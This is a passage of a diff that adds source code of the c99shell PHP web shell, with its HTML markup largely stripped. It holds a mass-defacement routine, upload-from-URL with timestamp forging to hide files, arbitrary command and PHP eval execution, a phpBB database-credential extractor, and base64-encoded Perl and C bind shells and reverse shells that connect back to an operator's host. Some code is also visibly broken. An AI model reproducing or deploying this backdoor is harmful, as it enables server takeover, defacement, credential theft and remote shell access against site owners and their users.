(!$deface_preview) {$actselect = "deface"; $actbox[] = $found; $notls = true;} + else {$ls_arr = $found;} + } + } + else + { + if (empty($deface_preview)) {$deface_preview = 1;} + if (empty($deface_html)) {$deface_html = "

    Mass-defaced with c99shell v. ".$shver.", coded by tristram[CCTeaM].
    ";} + } + echo "
    "; + if (!$submit) {echo "Attention! It's a very dangerous feature, you may lost your data.

    ";} + echo " +Deface for (file/directory name):   - regexp +
    Deface in (explode \";\"): +

    Search text:
    +

    - regexp +   - whole words only +   - case sensitive +   - find files NOT containing the text +
    - PREVIEW AFFECTED FILES +

    Html of deface:
    +

    "; + if ($act == "ls") {echo "
    Deface took ".$defacetime." secs

    ";} +} +if ($act == "search") +{ + if (empty($search_in)) {$search_in = $d;} + if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} + if (empty($search_text_wwo)) {$search_text_regexp = 0;} + + if (!empty($submit)) + { + $found = array(); + $found_d = 0; + $found_f = 0; + $a = array + ( + "name"=>$search_name, "name_regexp"=>$search_name_regexp, + "text"=>$search_text, "text_regexp"=>$search_text_regxp, + "text_wwo"=>$search_text_wwo, + "text_cs"=>$search_text_cs, + "text_not"=>$search_text_not + ); + $searchtime = getmicrotime(); + $in = array_unique(explode(";",$search_in)); + foreach($in as $v) + { + c99fsearch($v); + } + $searchtime = round(getmicrotime()-$searchtime,4); + if (count($found) == 0) {echo "No files found!";} + else + { + $ls_arr = $found; + $disp_fullpath = true; + $act = $dspact = "ls"; + } + } + echo "
    + +Search for (file/directory name):   - regexp +
    Search in (explode \";\"): +

    Text:
    +

    - regexp +   - whole words only +   - case sensitive +   - find files NOT containing the text +

    "; + if ($act == "ls") {echo "
    Search took ".$searchtime." secs

    ";} +} +if ($act == "upload") +{ + $uploadmess = ""; + $uploadpath = str_replace("\\","/",$uploadpath); + if (empty($uploadpath)) {$uploadpath = $d;} + elseif (substr($uploadpath,strlen($uploadpath)-1,1) != "/") {$uploadpath .= "/";} + if (!empty($submit)) + { + global $HTTP_POST_FILES; + $uploadfile = $HTTP_POST_FILES["uploadfile"]; + if (!empty($uploadfile[tmp_name])) + { + if (empty($uploadfilename)) {$destin = $uploadfile[name];} + else {$destin = $userfilename;} + if (!move_uploaded_file($uploadfile[tmp_name],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile[name]." (can't copy \"".$uploadfile[tmp_name]."\" to \"".$uploadpath.$destin."\"!
    ";} + } + elseif (!empty($uploadurl)) + { + if (!empty($uploadfilename)) {$destin = $uploadfilename;} + else + { + $destin = explode("/",$destin); + $destin = $destin[count($destin)-1]; + if (empty($destin)) + { + $i = 0; + $b = ""; + while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} + } + if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "Incorect url!
    ";} + else + { + $st = getmicrotime(); + $content = @file_get_contents($uploadurl); + $dt = round(getmicrotime()-$st,4); + if (!$content) {$uploadmess .= "Can't download file!
    ";} + else + { + if ($filestealth) {$stat = stat($uploadpath.$destin);} + $fp = fopen($uploadpath.$destin,"w"); + if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!
    ";} + else + { + fwrite($fp,$content,strlen($content)); + fclose($fp); + if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} + } + } + } + } + } + if ($miniform) + { + echo "".$uploadmess.""; + $act = "ls"; + } + else + { + echo "File upload:
    ".$uploadmess."
    +Select file on your local computer:
                   or
    +Input URL:

    +Save this file dir:

    +File-name (auto-fill):

    + convert file name to lovercase

    + +
    "; + } +} +if ($act == "delete") +{ + $delerr = ""; + foreach ($actbox as $v) + { + $result = false; + if (empty($v)) {} + $result = fs_rmobj($v); + if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."
    ";} + if (!empty($delerr)) {echo "Deleting with errors:
    ".$delerr;} + } +} +if ($act == "deface") +{ + $deferr = ""; + foreach ($actbox as $v) + { + $result = false; + if (empty($v)) {} + $result = fopen(); + if (!$result) {$deferr .= "Can't delete ".htmlspecialchars($v)."
    ";} + if (!empty($delerr)) {echo "Deleting with errors:
    ".$deferr;} + } +} +if (!$usefsbuff) +{ + if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "
    Sorry, buffer is disabled. For enable, set directive \"USEFSBUFF\" as TRUE.
    ";} +} +else +{ + if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls";} + if ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} + if ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} $ls_arr = array_merge($sess_data["copy"],$sess_data["cut"]); c99_sess_put($sess_data); $act = "ls";} + + if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!
    ";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!
    ";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "Pasting with errors:
    ".$psterr;} + } + elseif ($actarcbuff) + { + $arcerr = ""; + if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} + else {$ext = ".tar.gz";} + + if ($ext == ".tar.gz") + { + $cmdline = "tar cfzv"; + } + $objects = array_merge($sess_data["copy"],$sess_data["cut"]); + foreach($objects as $v) + { + $v = str_replace("\\","/",$v); + if (is_dir($v)) + { + if (substr($v,strlen($v)-1,strlen($v)) != "/") {$v .= "/";} + $v .= "*"; + } + $cmdline .= " ".$v; + } + $ret = `$cmdline`; + if (empty($ret)) {$arcerr .= "Can't call archivator!
    ";} + $ret = str_replace("\r\n","\n"); + $ret = explode("\n",$ret); + if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} + foreach($sess_data["cut"] as $k=>$v) + { + if (in_array($v,$ret)) {fs_rmobj($v);} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($arcerr)) {echo "Archivation errors:
    ".$arcerr;} + $act = "ls"; + } + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!
    ";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!
    ";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "Pasting with errors:
    ".$psterr;} + } +} +if ($act == "ls") +{ + if (count($ls_arr) > 0) {$list = $ls_arr;} + else + { + $list = array(); + if ($h = @opendir($d)) + { + while ($o = readdir($h)) {$list[] = $d.$o;} + closedir($h); + } + } + if (count($list) == 0) {echo "
    Can't open directory (".htmlspecialchars($d).")!
    ";} + else + { + //Building array + $tab = array(); + $amount = count($ld)+count($lf); + $vd = "f"; //Viewing mode + if ($vd == "f") + { + $row = array(); + $row[] = "Name"; + $row[] = "Size"; + $row[] = "Modify"; + if (!$win) + {$row[] = "Owner/Group";} + $row[] = "Perms"; + $row[] = "Action"; + + $k = $sort[0]; + if ((!is_numeric($k)) or ($k > count($row)-2)) {$k = 0;} + if ($sort[1] == "a") + { + $y = ""; + } + else + { + $y = ""; + } + + $row[$k] .= $y; + for($i=0;$i".$row[$i]."";} + } + + $tab = array(); + $tab[cols] = array($row); + $tab[head] = array(); + $tab[dirs] = array(); + $tab[links] = array(); + $tab[files] = array(); + + foreach ($list as $v) + { + $o = basename($v); + $dir = dirname($v); + + if ($disp_fullpath) {$disppath = $v;} + else {$disppath = $o;} + $disppath = str2mini($disppath,60); + + if (in_array($v,$sess_data["cut"])) {$disppath = "".$disppath."";} + elseif (in_array($v,$sess_data["copy"])) {$disppath = "".$disppath."";} + + $uo = urlencode($o); + $ud = urlencode($dir); + $uv = urlencode($v); + + $row = array(); + + if ($o == ".") + { + $row[] = " ".$o.""; + $row[] = "LINK"; + } + elseif ($o == "..") + { + $row[] = " ".$o.""; + $row[] = "LINK"; + } + elseif (is_dir($v)) + { + if (is_link($v)) {$disppath .= " => ".readlink($v); $type = "LINK";} + else {$type = "DIR";} + $row[] = " [".$disppath."]"; + $row[] = $type; + } + elseif(is_file($v)) + { + $ext = explode(".",$o); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $row[] = " ".$disppath.""; + $row[] = view_size(filesize($v)); + } + $row[] = date("d.m.Y H:i:s",filemtime($v)); + + if (!$win) + { + $ow = @posix_getpwuid(fileowner($v)); + $gr = @posix_getgrgid(filegroup($v)); + $row[] = $ow["name"]."/".$gr["name"]; + } + + if (is_writable($v)) {$row[] = "".view_perms(fileperms($v))."";} + else {$row[] = "".view_perms(fileperms($v))."";} + + if (is_dir($v)) {$row[] = " ";} + else {$row[] = "   ";} + + if (($o == ".") or ($o == "..")) {$tab[head][] = $row;} + elseif (is_link($v)) {$tab[links][] = $row;} + elseif (is_dir($v)) {$tab[dirs][] = $row;} + elseif (is_file($v)) {$tab[files][] = $row;} + } + } + $v = $sort[0]; + function tabsort($a, $b) + { + global $v; + return strnatcasecmp(strip_tags($a[$v]), strip_tags($b[$v])); + } + usort($tab[dirs], "tabsort"); + usort($tab[files], "tabsort"); + if ($sort[1] == "a") + { + $tab[dirs] = array_reverse($tab[dirs]); + $tab[files] = array_reverse($tab[files]); + } + //Compiling table + $table = array_merge($tab[cols],$tab[head],$tab[dirs],$tab[links],$tab[files]); + echo "Listing directory (".count($tab[files])." files and ".(count($tab[dirs])+count($tab[links]))." directories):

    "; + echo ""; + foreach($table as $row) + { + echo "\r\n"; + foreach($row as $v) {echo "\r\n";} + echo "\r\n"; + } + echo "
    ".$v."

    "; + if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) + { + echo "                   "; + } + echo " 

    "; + echo ""; + } +} +if ($act == "bind") +{ + $bndsrcs = array( +"c99sh_bindport.pl"=> +"IyEvdXNyL2Jpbi9wZXJsDQppZiAoQEFSR1YgPCAxKSB7ZXhpdCgxKTt9DQokcG9ydCA9ICRBUkdW". +"WzBdOw0KZXhpdCBpZiBmb3JrOw0KJDAgPSAidXBkYXRlZGIiIC4gIiAiIHgxMDA7DQokU0lHe0NI". +"TER9ID0gJ0lHTk9SRSc7DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsIFBGX0lORVQsIFNPQ0tfU1RS". +"RUFNLCAwKTsNCnNldHNvY2tvcHQoUywgU09MX1NPQ0tFVCwgU09fUkVVU0VBRERSLCAxKTsNCmJp". +"bmQoUywgc29ja2FkZHJfaW4oJHBvcnQsIElOQUREUl9BTlkpKTsNCmxpc3RlbihTLCA1MCk7DQph". +"Y2NlcHQoWCxTKTsNCm9wZW4gU1RESU4sICI8JlgiOw0Kb3BlbiBTVERPVVQsICI+JlgiOw0Kb3Bl". +"biBTVERFUlIsICI+JlgiOw0KZXhlYygiZWNobyBcIldlbGNvbWUgdG8gYzk5c2hlbGwhXHJcblxy". +"XG5cIiIpOw0Kd2hpbGUoMSkNCnsNCiBhY2NlcHQoWCwgUyk7DQogdW5sZXNzKGZvcmspDQogew0K". +"ICBvcGVuIFNURElOLCAiPCZYIjsNCiAgb3BlbiBTVERPVVQsICI+JlgiOw0KICBjbG9zZSBYOw0K". +"ICBleGVjKCIvYmluL3NoIik7DQogfQ0KIGNsb3NlIFg7DQp9", + +"c99sh_bindport.c"=> +"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5". +"cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4N". +"CiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50IGFyZ2M7DQpjaGFy". +"ICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1". +"Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5f". +"ZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9pKGFyZ3ZbMV0p". +"KTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tm". +"ZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigi". +"c29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikmcmVtb3Rl". +"LCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1h". +"Y2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsN". +"CiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk7DQogICBy". +"ZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1Zikp". +"DQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byBjOTlzaGVsbCAmJiAvYmluL2Jhc2ggLWkiKTsN". +"CiAgIGVsc2UNCiAgIGZwcmludGYoc3RkZXJyLCJTb3JyeSIpOw0KICAgY2xvc2UobmV3ZmQpOw0K". +"ICB9DQogfQ0KfQ0KaW50IGNocGFzcyhjaGFyICpiYXNlLCBjaGFyICplbnRlcmVkKSB7DQppbnQg". +"aTsNCmZvcihpPTA7aTxzdHJsZW4oZW50ZXJlZCk7aSsrKSANCnsNCmlmKGVudGVyZWRbaV0gPT0g". +"J1xuJykNCmVudGVyZWRbaV0gPSAnXDAnOyANCmlmKGVudGVyZWRbaV0gPT0gJ1xyJykNCmVudGVy". +"ZWRbaV0gPSAnXDAnOw0KfQ0KaWYgKCFzdHJjbXAoYmFzZSxlbnRlcmVkKSkNCnJldHVybiAwOw0K". +"fQ==", + +"c99sh_backconn.pl"=> +"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJ". +"HN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZ". +"DsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJ". +"HRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0L". +"CAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgnd". +"GNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka". +"WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yO". +"iAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLR". +"VQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlK". +"FNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==", + +"c99sh_backconn.c"=> +"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5l". +"dGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZk". +"Ow0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJybSAtZiAiOyANCiBk". +"YWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0g". +"aHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihh". +"cmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJsZW4oYXJndlsy". +"XSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsg". +"DQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1". +"Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7DQogICBleGl0". +"KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIo". +"ZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwi". +"c2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==" +); + + $bndportsrcs = array( +"c99sh_bindport.pl"=>array("Using PERL","perl %path %port"), +"c99sh_bindport.c"=>array("Using C","%path %port %pass") +); + + $bcsrcs = array( +"c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"), +"c99sh_backconn.c"=>array("Using C","%path %host %port") +); + + if ($win) {echo "Binding port and Back connect:
    This functions not work in Windows!

    ";} + else + { + if (!is_array($bind)) {$bind = array();} + if (!is_array($bc)) {$bc = array();} + if (!is_numeric($bind[port])) {$bind[port] = $bindport_port;} + if (empty($bind[pass])) {$bind[pass] = $bindport_pass;} + if (empty($bc[host])) {$bc[host] = $REMOTE_ADDR;} + if (!is_numeric($bc[port])) {$bc[port] = $bindport_port;} + if (!empty($bindsubmit)) + { + echo "Result of binding port:
    "; + $v = $bndportsrcs[$bind[src]]; + if (empty($v)) {echo "Unknown file!
    ";} + elseif (fsockopen($SERVER_ADDR,$bind[port],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!
    ";} + else + { + $srcpath = $tmpdir.$bind[src]; + $w = explode(".",$bind[src]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $binpath = $tmpdir.join(".",$w); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
    ";} + else + { + $data = base64_decode($bndsrcs[$bind[src]]); + fwrite($fp,$data,strlen($data)); + fclose($fp); + + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%port",$bind[port],$v[1]); + $v[1] = str_replace("%pass",$bind[pass],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + sleep(5); //Timeout + $sock = fsockopen("localhost",$bind[port],$errno,$errstr,5); + if (!$sock) {echo "I can't connect to localhost:".$bind[port]."! I think you should configure your firewall.";} + else {echo "Binding... ok! Connect to ".$SERVER_ADDR.":".$bind[port]."! You should use NetCat©, run \"nc -v ".$SERVER_ADDR." ".$bind[port]."\"!
    View binder's process
    ";} + } + echo "
    "; + } + } + if (!empty($bcsubmit)) + { + echo "Result of back connection:
    "; + $v = $bcsrcs[$bc[src]]; + if (empty($v)) {echo "Unknown file!
    ";} + else + { + $srcpath = $tmpdir.$bc[src]; + $w = explode(".",$bc[src]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $binpath = $tmpdir.join(".",$w); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
    ";} + else + { + $data = base64_decode($bndsrcs[$bind[src]]); + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%host",$bc[host],$v[1]); + $v[1] = str_replace("%port",$bc[port],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + echo "Now script try connect to ".$bc[host].":".$bc[port]."...
    "; + } + } + } + ?>Binding port:
    Port:  Password:   
    +Back connection:
    HOST:  Port:   
    +Click "Connect" only after open port for it. You should use NetCat©, run "nc -l -n -v -p <port>"!Result of execution this command
    :
    "; + $tmp = ob_get_contents(); + $olddir = realpath("."); + @chdir($d); + if ($tmp) + { + ob_clean(); + myshellexec($cmd); + $ret = ob_get_contents(); + $ret = convert_cyr_string($ret,"d","w"); + ob_clean(); + echo $tmp; + if ($cmd_txt) + { + $rows = count(explode(" +",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "
    "; + } + else {echo $ret;} + } + else + { + if ($cmd_txt) + { + echo "
    "; + } + else {echo $ret;} + } + @chdir($olddir); + } + else {echo "Execution command"; if (empty($cmd_txt)) {$cmd_txt = true;}} + echo "


     Display in text-area 
    "; +} +if ($act == "ps_aux") +{ + echo "Processes:
    "; + if ($win) {echo "This function not work in Windows!

    ";} + else + { + if ($pid) + { + if (!$sig) {$sig = 9;} + echo "Sending signal ".$sig." to #".$pid."... "; + $ret = posix_kill($pid,$sig); + if ($ret) {echo "ok. he is dead, amen.";} + else {echo "ERROR. Can't send signal ".htmlspecialchars($sig).", to process #".htmlspecialchars($pid).".";} + } + $ret = `ps -aux`; + if (!$ret) {echo "Can't execute \"ps -aux\"!";} + else + { + $ret = htmlspecialchars($ret); + $ret = str_replace(" "," ",$ret); + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $prcs = explode("\n",$ret); + $head = explode(" ",$prcs[0]); + $head[] = "ACTION"; + unset($prcs[0]); + echo ""; + echo ""; + foreach ($head as $v) {echo "";} + echo ""; + foreach ($prcs as $line) + { + if (!empty($line)) + { + echo ""; + $line = explode(" ",$line); + $line[10] = join(" ",array_slice($line,10,count($line))); + $line = array_slice($line,0,11); + $line[] = "KILL"; + foreach ($line as $v) {echo "";} + echo ""; + } + } + echo "
       ".$v."   
       ".$v."   
    "; + } + } +} +if ($act == "eval") +{ + if (!empty($eval)) + { + echo "Result of execution this PHP-code:
    "; + $tmp = ob_get_contents(); + $olddir = realpath("."); + @chdir($d); + if ($tmp) + { + ob_clean(); + eval($eval); + $ret = ob_get_contents(); + $ret = convert_cyr_string($ret,"d","w"); + ob_clean(); + echo $tmp; + if ($eval_txt) + { + $rows = count(explode(" +",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "
    "; + } + else {echo $ret;} + } + else + { + if ($eval_txt) + { + echo "
    "; + } + else {echo $ret;} + } + @chdir($olddir); + } + else {echo "Execution PHP-code"; if (empty($eval_txt)) {$eval_txt = true;}} + echo "


     Display in text-area 
    "; +} +if ($act == "f") +{ + $r = @file_get_contents($d.$f); + if (!is_readable($d.$f) and $ft != "edit") + { + if (file_exists($d.$f)) {echo "
    Permision denied (".htmlspecialchars($d.$f).")!
    ";} + else {echo "
    File does not exists (".htmlspecialchars($d.$f).")!
    Create
    ";} + } + else + { + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($ftypes as $k=>$v) + { + if (in_array($ext,$v)) {$rft = $k; break;} + } + if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} + if (empty($ft)) {$ft = $rft;} + $arr = array( +array("","info"), +array("","html"), +array("","txt"), +array("Code","code"), +array("Session","phpsess"), +array("","exe"), +array("SDB","sdb"), +array("","img"), +array("","ini"), +array("","download"), +array("","notepad"), +array("","edit") +); + echo "Viewing file:     ".$f." (".view_size(filesize($d.$f)).")      "; + if (is_writable($d.$f)) {echo "full read/write access (".view_perms(fileperms($d.$f)).")";} + else {echo "Read-Only (".view_perms(fileperms($d.$f)).")";} + echo "
    Select action/file-type:
    "; + foreach($arr as $t) + { + if ($t[1] == $rft) {echo " ".$t[0]."";} + elseif ($t[1] == $ft) {echo " ".$t[0]."";} + else + { + echo " ".$t[0].""; + } + echo " (+) |"; + } + echo "
    "; + if ($ft == "info") + { + echo "Information:"; + echo ""; + echo ""; + echo ""; + if (!$win) + { + echo ""; + echo ""; + echo ""; + echo ""; + echo "
    Size ".view_size(filesize($d.$f))."
    MD5 ".md5_file($d.$f)."
    Owner/Group "; + $tmp=posix_getpwuid(fileowner($d.$f)); + if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." "; + else echo $tmp['name']." "; + $tmp=posix_getgrgid(filegroup($d.$f)); + if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f); + else echo $tmp['name']; + } + echo "
    Perms"; + + if (is_writable($d.$f)) + { + echo "".view_perms(fileperms($d.$f)).""; + } + else + { + echo "".view_perms(fileperms($d.$f)).""; + } + + echo "
    Create time ".date("d/m/Y H:i:s",filectime($d.$f))."
    Access time ".date("d/m/Y H:i:s",fileatime($d.$f))."
    MODIFY time ".date("d/m/Y H:i:s",filemtime($d.$f))."

    "; + + + $fi = fopen($d.$f,"rb"); + if ($fi) + { + if ($fullhexdump) + { + echo "FULL HEXDUMP"; + $str=fread($fi,filesize($d.$f)); + } + else + { + echo "HEXDUMP PREVIEW"; + $str=fread($fi,$hexdump_lines*$hexdump_rows); + } + $n=0; + $a0="00000000
    "; + $a1=""; + $a2=""; + for ($i=0; $i";} + $a1.="
    "; + $a2.="
    "; + } + } + //if ($a1!="") {$a0.=sprintf("%08X",$i)."
    ";} + echo "
    $a0". + "$a1$a2

    "; + } + $encoded = ""; + if ($base64 == 1) + { + echo "Base64 Encode
    "; + $encoded = base64_encode($r); + } + elseif($base64 == 2) + { + echo "Base64 Encode + Chunk
    "; + $encoded = chunk_split(base64_encode($r)); + } + elseif($base64 == 3) + { + echo "Base64 Encode + Chunk + Quotes
    "; + $encoded = base64_encode($r); + $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); + } + elseif($base64 == 4) + { + } + if (!empty($encoded)) + { + echo "

    "; + } + echo "HEXDUMP: [Full] [Preview]
    Base64: +
    [Encode + [+chunk + [+chunk+quotes + [Decode +

    "; + } + elseif ($ft == "html") + { + if ($white) {@ob_clean();} + echo $r; + if ($white) {exit;} + } + elseif ($ft == "txt") + { + echo "

    ".htmlspecialchars($r)."
    "; + } + elseif ($ft == "ini") + { + echo "
    ";
    +   var_dump(parse_ini_file($d.$f,true));
    +   echo "
    "; + } + elseif ($ft == "phpsess") + { + echo "
    ";
    +   $v = explode("|",$r);
    +   echo $v[0]."
    "; + var_dump(unserialize($v[1])); + echo "
    "; + } + elseif ($ft == "exe") + { + echo "
     
    "; + } + elseif ($ft == "sdb") + { + echo "
    ";
    +   var_dump(unserialize(base64_decode($r)));
    +   echo "
    "; + } + elseif ($ft == "code") + { + if (ereg("phpBB 2.(.*) auto-generated config file",$r)) + { + $arr = explode(" +",$r); + if (count($arr == 18)) + { + include($d.$f); + echo "phpBB configuration is detected in this file!
    "; + if ($dbms == "mysql4") {$dbms = "mysql";} + if ($dbms == "mysql") {echo "Connect to DB

    ";} + else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell";} + echo "Parameters for manual connect:
    "; + $cfgvars = array( + "dbms"=>$dbms, + "dbhost"=>$dbhost, + "dbname"=>$dbname, + "dbuser"=>$dbuser, + "dbpasswd"=>$dbpasswd + ); + foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'
    ";} + + echo "
    "; + echo "
    "; + } + } + echo "
    "; + if (!empty($white)) {@ob_clean();} + if ($rehtml) {$r = rehtmlspecialchars($r);} + $r = stripslashes($r); + $strip = false; + if(!strpos($r,""; $r = trim($r); $strip = true;} + $r = @highlight_string($r, TRUE); + if ($delspace) {$buffer = str_replace (" ", " ", $r);} + echo $r; + if (!empty($white)) {exit;} + echo "
    "; + } + elseif ($ft == "download") + { + @ob_clean(); + header("Content-type: Php Shell"); + header("Content-disposition: attachment; filename=\"".$f."\";"); + echo($r); + exit; + } + elseif ($ft == "notepad") + { + @ob_clean(); + header("Content-type: text/plain"); + header("Content-disposition: attachment; filename=\"".$f.".txt\";"); + echo($r); + exit; + } + elseif ($ft == "img") + { + if (!$white) + { + echo "
